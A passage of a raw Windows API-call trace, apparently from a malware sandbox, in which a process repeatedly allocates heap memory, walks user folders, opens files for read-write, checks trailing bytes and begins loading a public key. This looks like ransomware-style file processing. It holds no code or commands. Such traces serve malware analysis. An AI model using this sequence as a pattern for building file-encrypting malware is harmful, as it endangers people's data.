hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.252] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8940 | out: hHeap=0x660000) returned 1 [0060.252] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8940 [0060.252] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.252] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.252] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8940 | out: hHeap=0x660000) returned 1 [0060.252] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8940 [0060.252] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.252] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.252] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8940 | out: hHeap=0x660000) returned 1 [0060.252] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8940 [0060.252] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.252] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0060.252] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.252] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.252] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8940 | out: hHeap=0x660000) returned 1 [0060.252] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8940 [0060.252] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.252] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.253] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8940 | out: hHeap=0x660000) returned 1 [0060.253] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8940 [0060.253] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.253] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.253] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8940 | out: hHeap=0x660000) returned 1 [0060.253] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8940 [0060.253] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.253] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.253] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8940 | out: hHeap=0x660000) returned 1 [0060.253] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8940 [0060.253] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.253] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.253] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8940 | out: hHeap=0x660000) returned 1 [0060.253] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8940 [0060.253] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.253] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.253] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8940 | out: hHeap=0x660000) returned 1 [0060.253] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8940 [0060.253] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.253] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.253] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8940 | out: hHeap=0x660000) returned 1 [0060.253] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8940 [0060.253] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.253] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.253] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8940 | out: hHeap=0x660000) returned 1 [0060.253] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8940 [0060.253] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.253] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.253] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8940 | out: hHeap=0x660000) returned 1 [0060.253] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8940 [0060.253] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.253] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.253] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8940 | out: hHeap=0x660000) returned 1 [0060.254] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8940 [0060.254] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.254] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.254] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8940 | out: hHeap=0x660000) returned 1 [0060.254] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8940 [0060.254] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.254] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.254] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8940 | out: hHeap=0x660000) returned 1 [0060.254] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8940 [0060.254] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.254] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.254] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8940 | out: hHeap=0x660000) returned 1 [0060.254] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8940 [0060.254] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.254] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.254] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8940 | out: hHeap=0x660000) returned 1 [0060.254] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8940 [0060.254] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.254] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.254] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8940 | out: hHeap=0x660000) returned 1 [0060.254] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8940 [0060.254] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.254] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.254] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8940 | out: hHeap=0x660000) returned 1 [0060.254] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8940 [0060.254] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.254] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0060.254] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.254] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.254] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8940 | out: hHeap=0x660000) returned 1 [0060.254] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8940 [0060.254] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.254] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.254] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8940 | out: hHeap=0x660000) returned 1 [0060.255] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8940 [0060.255] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.255] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0060.255] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.255] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.255] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8940 | out: hHeap=0x660000) returned 1 [0060.255] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8940 [0060.255] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.255] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.255] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8940 | out: hHeap=0x660000) returned 1 [0060.255] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8940 [0060.255] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.255] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.255] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8940 | out: hHeap=0x660000) returned 1 [0060.255] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8940 [0060.255] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.255] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.255] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8940 | out: hHeap=0x660000) returned 1 [0060.255] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8940 [0060.255] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.255] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.255] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8940 | out: hHeap=0x660000) returned 1 [0060.255] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0060.255] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0060.255] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0060.255] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0060.255] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0060.255] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.255] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0060.256] PathFindFileNameW (pszPath="") returned="" [0060.256] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0060.256] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8940 | out: hHeap=0x660000) returned 1 [0060.256] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.256] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CryptnetUrlCache", cAlternateFileName="CRYPTN~1")) returned 1 [0060.256] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IME12", cAlternateFileName="")) returned 1 [0060.256] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IMJP12", cAlternateFileName="")) returned 1 [0060.256] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IMJP8_1", cAlternateFileName="")) returned 1 [0060.256] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IMJP9_0", cAlternateFileName="")) returned 1 [0060.256] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5616fca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x5616fca0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0060.256] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5616fca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x5616fca0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 0 [0060.256] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0060.256] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0060.256] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8720 | out: hHeap=0x660000) returned 1 [0060.256] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0060.256] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0060.256] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0060.257] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0060.257] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0060.257] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0060.257] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0060.257] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.257] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0060.257] PathFindFileNameW (pszPath="") returned="" [0060.257] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0060.258] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.258] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.258] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Java", cAlternateFileName="")) returned 1 [0060.258] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Java", cAlternateFileName="")) returned 0 [0060.258] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0060.258] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0060.258] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0060.258] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\") returned="_private\\" [0060.258] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="My Shapes\\" [0060.258] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0060.258] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0060.258] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0060.258] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0060.258] PathFindFileNameW (pszPath="") returned="" [0060.258] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0060.259] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.259] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0060.259] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico") returned=".ico" [0060.259] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.260] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=29926) returned 1 [0060.260] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.264] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x74c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.265] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.268] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.268] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x74e6, lpOverlapped=0x0) returned 1 [0060.268] lstrlenA (lpString="-----BEGIN PUBLIC 